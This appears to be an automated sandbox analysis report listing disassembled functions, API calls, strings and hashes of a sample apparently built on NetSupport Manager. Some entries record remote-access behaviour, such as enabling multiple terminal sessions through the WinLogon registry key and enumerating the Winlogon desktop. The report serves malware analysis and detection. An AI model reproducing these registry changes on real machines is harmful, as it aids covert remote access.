                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$EnumExitLocalSleepThreadTimeWindows_mallocwvsprintf
                                                                                                                        • String ID: Kill Thread$StartThread
                                                                                                                        • API String ID: 429528851-2688637858
                                                                                                                        • Opcode ID: 50c4c215df446e6671d3383635dc97343dfd8b738375cbb7581b5e3732ca40dd
                                                                                                                        • Instruction ID: 34f2c5aa704dd35e81959df92d22b6cf532e8c6c698de0f07821cc91f9cb98e3
                                                                                                                        • Opcode Fuzzy Hash: 50c4c215df446e6671d3383635dc97343dfd8b738375cbb7581b5e3732ca40dd
                                                                                                                        • Instruction Fuzzy Hash: 11F0A035945318AAD621AB90AC0EFB236A1BB00B44F140525FB0A171F29BF81499DB97
                                                                                                                        Function 00B22DF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B22E27
                                                                                                                        • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 00B22E40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Messagewsprintf
                                                                                                                        • String ID: Invalid Parameter %c%cCommand Line: <%s>Version: %s$V14.10$WINST32
                                                                                                                        • API String ID: 300413163-1732868714
                                                                                                                        • Opcode ID: a78db9b1905238020989b7057132e5caabcdf38be04c6738ef34b83b58a5f9ad
                                                                                                                        • Instruction ID: fab923bd3a8377229bc5372ddd85efe8795c625930992a827701a32f26a2b6c1
                                                                                                                        • Opcode Fuzzy Hash: a78db9b1905238020989b7057132e5caabcdf38be04c6738ef34b83b58a5f9ad
                                                                                                                        • Instruction Fuzzy Hash: FAF06870740208ABDB40DF98DC46F6A37E8FB04701F4441A8F90D971D0EEB0AA04DBA5
                                                                                                                        Function 00B00E40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00B00E5C
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$IsEmpty()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                                                        • API String ID: 501242067-828034582
                                                                                                                        • Opcode ID: 5ee33ef491d725e96c108105b76f9c81bb922f8ac390cfe5bbd7e8d85dac0bb9
                                                                                                                        • Instruction ID: fe197d4492a7bb0b4fbdfb8c898f232910c4c951177a97e7663e0aa5c89fe0f3
                                                                                                                        • Opcode Fuzzy Hash: 5ee33ef491d725e96c108105b76f9c81bb922f8ac390cfe5bbd7e8d85dac0bb9
                                                                                                                        • Instruction Fuzzy Hash: 11F0F0B1B643019BD720AF1CE806B5677D8EF58704F1084A9F54AD32D2E6B4A800CB92
                                                                                                                        Function 00B0E770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnumWindows.USER32(Function_0002E090,?), ref: 00B0E792
                                                                                                                        • OpenDesktopW.USER32(Winlogon,00000000,00000000,02000000), ref: 00B0E7B0
                                                                                                                        • EnumDesktopWindows.USER32(00000000,Function_0002E090,?), ref: 00B0E7BF
                                                                                                                        • CloseDesktop.USER32(00000000,?,00B0E7EE), ref: 00B0E7C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Desktop$EnumWindows$CloseOpen
                                                                                                                        • String ID: Winlogon
                                                                                                                        • API String ID: 1029573575-744610081
                                                                                                                        • Opcode ID: 3641bd6e42587d856b3e0f36155c90f08a0078563791903b5ee3b25254df05a6
                                                                                                                        • Instruction ID: 193d8ad735dbe8d2e59161116911d3b9d09fce51486487f8ab48e1296f52c433
                                                                                                                        • Opcode Fuzzy Hash: 3641bd6e42587d856b3e0f36155c90f08a0078563791903b5ee3b25254df05a6
                                                                                                                        • Instruction Fuzzy Hash: 1EF0A0716017507BFB320720AC8CF96AE9DDBA6B65F1004A9F212A61E18BF88C40C6A4
                                                                                                                        Function 00B16840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B16853
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00B16865
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B16875
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                        • API String ID: 145871493-545709139
                                                                                                                        • Opcode ID: c695510c6bd5a7bd78ebdc69ac8c816af988a2c4a8e66ae9e99966a25f19a9ae
                                                                                                                        • Instruction ID: 50f406e007e843fb9b39620b02e31e617795692b879bce30eb4d58b9ed53643e
                                                                                                                        • Opcode Fuzzy Hash: c695510c6bd5a7bd78ebdc69ac8c816af988a2c4a8e66ae9e99966a25f19a9ae
                                                                                                                        • Instruction Fuzzy Hash: 87F0A0326456224BC3258B39AC887EE37DAEBC1760B520562E418D32F0DE78C880C254
                                                                                                                        Function 00B25030 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\WinLogon,00000000,0002001F,?), ref: 00B25052
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,AllowMultipleTSSessions,00000000,00000004,00000000,00000004), ref: 00B25083
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2508D
                                                                                                                        Strings
                                                                                                                        • AllowMultipleTSSessions, xrefs: 00B2506D
                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\WinLogon, xrefs: 00B25041
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID: AllowMultipleTSSessions$Software\Microsoft\Windows NT\CurrentVersion\WinLogon
                                                                                                                        • API String ID: 779948276-1159474132
                                                                                                                        • Opcode ID: 85499eb6fa55e153405d5bbe2e0b6baeb60e789bb8bf4ec2ed7923267bbf8ba5
                                                                                                                        • Instruction ID: e7e35dae4f4ea5f0a8d38ee44249100b3c6dd82779c13b71d325493327c9cea6
                                                                                                                        • Opcode Fuzzy Hash: 85499eb6fa55e153405d5bbe2e0b6baeb60e789bb8bf4ec2ed7923267bbf8ba5
                                                                                                                        • Instruction Fuzzy Hash: 83F0B274A40208BBEB20DB90DD49B9D76B8E704705F204094FA08A71D1D6F55A449B95
                                                                                                                        Function 00B042D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(?), ref: 00B042D9
                                                                                                                        • SendMessageW.USER32(?,0000045B,?,00000000), ref: 00B0430D
                                                                                                                        • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 00B0431C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                        • API String ID: 2326795674-1196874063
                                                                                                                        • Opcode ID: 708efe076b183dbfc4746de8f242ccb32bf013685f14062cd8296d042ba6fd0c
                                                                                                                        • Instruction ID: 6506489ef5cfd9c6a63f1d6172c0a2da25d3af54064f37fdc775d4cea64b62a5
                                                                                                                        • Opcode Fuzzy Hash: 708efe076b183dbfc4746de8f242ccb32bf013685f14062cd8296d042ba6fd0c
                                                                                                                        • Instruction Fuzzy Hash: 11E0487639071437EA216A66AC06F9F3B5CDB95B21F114061FB08BB1C1DAE8A5014AE9
                                                                                                                        Function 00AFEA10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,System\CurrentControlSet\Services\pcisys,00000000,00020006,?), ref: 00AFEA29
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,DisplayPath), ref: 00AFEA3C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFEA46
                                                                                                                        Strings
                                                                                                                        • System\CurrentControlSet\Services\pcisys, xrefs: 00AFEA1F
                                                                                                                        • DisplayPath, xrefs: 00AFEA36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                        • String ID: DisplayPath$System\CurrentControlSet\Services\pcisys
                                                                                                                        • API String ID: 849931509-2555881177
                                                                                                                        • Opcode ID: 530ca3b72d845c2d141967106ba19169b1ed1b0f9e39097e3933d7a728287969
                                                                                                                        • Instruction ID: 1d8f16136c8035f5d20bb304568b63b615d443aa19646f195fafc5491c09d6c7
                                                                                                                        • Opcode Fuzzy Hash: 530ca3b72d845c2d141967106ba19169b1ed1b0f9e39097e3933d7a728287969
                                                                                                                        • Instruction Fuzzy Hash: 0DE08675B40308B7D720DBD1DD45F6A73BCF748701F100188FE0563190D9B4E9009A50
                                                                                                                        Function 00B32470 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B324B9
                                                                                                                        • GetUserNameW.ADVAPI32(?,00B0F6B1), ref: 00B324D9
                                                                                                                          • Part of subcall function 00B31500: LoadLibraryW.KERNEL32(ADVAPI32.DLL,00000105,00B324EA), ref: 00B3150E
                                                                                                                        • _free.LIBCMT ref: 00B32588
                                                                                                                          • Part of subcall function 00B31D50: GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B31E3C
                                                                                                                          • Part of subcall function 00B31D50: GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,00000000), ref: 00B31EB2
                                                                                                                          • Part of subcall function 00B31D50: GetLastError.KERNEL32(?,?,00000000), ref: 00B31EBC
                                                                                                                          • Part of subcall function 00B31D50: GetLengthSid.ADVAPI32(?,?,?,00000000), ref: 00B31ED7
                                                                                                                          • Part of subcall function 00B31D50: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00B31EEB
                                                                                                                          • Part of subcall function 00B31D50: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00B31EF2
                                                                                                                          • Part of subcall function 00B31D50: InitializeAcl.ADVAPI32(00000000,?,00000002,?,?,00000000), ref: 00B31EFE
                                                                                                                          • Part of subcall function 00B31D50: GetLastError.KERNEL32(?,?,00000000), ref: 00B31F08
                                                                                                                          • Part of subcall function 00B31D50: GetAce.ADVAPI32(?,00000000,?,?,?,00000000), ref: 00B31F49
                                                                                                                        • _free.LIBCMT ref: 00B32597
                                                                                                                        • _free.LIBCMT ref: 00B325A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorHeapLast$AddressAllocInformationInitializeLengthLibraryLoadNameProcProcessUser_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 934549695-0
                                                                                                                        • Opcode ID: a5528dc83effeb0051bacfac2c41d894acbd1c78b0b0a216b48bc773f4da803b
                                                                                                                        • Instruction ID: 3520a0168c5d8d815eb9d4ffa75b92970ef7656cfaa70e6fcead2732f72f9bba
                                                                                                                        • Opcode Fuzzy Hash: a5528dc83effeb0051bacfac2c41d894acbd1c78b0b0a216b48bc773f4da803b
                                                                                                                        • Instruction Fuzzy Hash: E0415172C41228ABCB25EBA4DD49BDEB3F8EF58710F1046D9E90A67141EB346B44CF90
                                                                                                                        Function 00B325E0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B32629
                                                                                                                        • GetUserNameW.ADVAPI32(?,00B2EC03), ref: 00B32649
                                                                                                                          • Part of subcall function 00B31500: LoadLibraryW.KERNEL32(ADVAPI32.DLL,00000105,00B324EA), ref: 00B3150E
                                                                                                                        • _free.LIBCMT ref: 00B326F2
                                                                                                                        • _free.LIBCMT ref: 00B326FE
                                                                                                                        • _free.LIBCMT ref: 00B3270A
                                                                                                                          • Part of subcall function 00B316C0: GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B31796
                                                                                                                          • Part of subcall function 00B316C0: GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,00000105,00000000), ref: 00B31806
                                                                                                                          • Part of subcall function 00B316C0: GetLastError.KERNEL32(?,?,00000105,00000000), ref: 00B31816
                                                                                                                          • Part of subcall function 00B316C0: GetLengthSid.ADVAPI32(?,?,?,00000105,00000000), ref: 00B3182D
                                                                                                                          • Part of subcall function 00B316C0: GetProcessHeap.KERNEL32(00000000,?,?,?,00000105,00000000), ref: 00B31841
                                                                                                                          • Part of subcall function 00B316C0: HeapAlloc.KERNEL32(00000000,?,?,00000105,00000000), ref: 00B31848
                                                                                                                          • Part of subcall function 00B316C0: InitializeAcl.ADVAPI32(00000000,?,00000002,?,?,00000105,00000000), ref: 00B31858
                                                                                                                          • Part of subcall function 00B316C0: GetLastError.KERNEL32(?,?,00000105,00000000), ref: 00B31862
                                                                                                                          • Part of subcall function 00B316C0: GetAce.ADVAPI32(?,00000000,?,?,?,00000105,00000000), ref: 00B318A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorHeapLast$AddressAllocInformationInitializeLengthLibraryLoadNameProcProcessUser_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 934549695-0
                                                                                                                        • Opcode ID: cdb93c58fa2f4ca4c3855f9b8954ed78ef86391902e1b1ee93b6489b78ebf512
                                                                                                                        • Instruction ID: 0c7bfd9325a23ea2fe6f3f903d14c9e0691c113e364ef24c50862266dc86f725
                                                                                                                        • Opcode Fuzzy Hash: cdb93c58fa2f4ca4c3855f9b8954ed78ef86391902e1b1ee93b6489b78ebf512
                                                                                                                        • Instruction Fuzzy Hash: 68314176841218ABCB25EBA4DD49FDEB3F8EF58710F1046D9E90A67180EB346B44CF90
                                                                                                                        Function 00B14050 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PlaySoundW.WINMM(00B8B7E8,00000000,00020001), ref: 00B14155
                                                                                                                          • Part of subcall function 00B38406: __fassign.LIBCMT ref: 00B383E3
                                                                                                                          • Part of subcall function 00B3B767: __isdigit_l.LIBCMT ref: 00B3B78C
                                                                                                                        • Beep.KERNEL32(00000000,00000000), ref: 00B14119
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00B1412B
                                                                                                                        • MessageBeep.USER32(-00000010), ref: 00B1413F
                                                                                                                        • MessageBeep.USER32(?), ref: 00B14161
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Beep$Message$PlaySound__fassign__isdigit_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3205513384-0
                                                                                                                        • Opcode ID: a4531dda29804e6140b63a98792ce077235dea8f40968403de01581d663b61b0
                                                                                                                        • Instruction ID: 3527cfddbe3f595e600d380d2cdf9f23eeca8e3864bd129f5e0fb70df269d929
                                                                                                                        • Opcode Fuzzy Hash: a4531dda29804e6140b63a98792ce077235dea8f40968403de01581d663b61b0
                                                                                                                        • Instruction Fuzzy Hash: 2121F676500310A2E6102765AC06BFB36D8DFD0BA1F8400B5FE1D931A1EB35CCE1D262
                                                                                                                        Function 00AE94E0 Relevance: 7.6, APIs: 5, Instructions: 86memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00AE9518
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AE951D
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 00AE9534
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00B8A118,?,00000001,00000001), ref: 00AE9560
                                                                                                                        • EqualSid.ADVAPI32(?,00000000,?,00000001,00000001), ref: 00AE9573
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationToken$AllocateEqualInitialize__alloca_probe_16
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1863994463-0
                                                                                                                        • Opcode ID: 8119bf245463a339d61dc67862bce7cb5610e81c48843a9c918ff7dbd79b3ee9
                                                                                                                        • Instruction ID: aa0d5bdad85a8601179fb6e798e67266d769090cb33b27a754827d463b28a0e7
                                                                                                                        • Opcode Fuzzy Hash: 8119bf245463a339d61dc67862bce7cb5610e81c48843a9c918ff7dbd79b3ee9
                                                                                                                        • Instruction Fuzzy Hash: 6E212F71A01209ABEB10DBA5DC85FBFB7F8EB48700F50045AA914E7291EAB19D048BA1
                                                                                                                        Function 00B06AB0 Relevance: 7.6, APIs: 5, Instructions: 77memorywindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000042), ref: 00B06AE5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B06AFA
                                                                                                                        • CreatePalette.GDI32(00000000), ref: 00B06B5C
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B06B68
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B06B6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
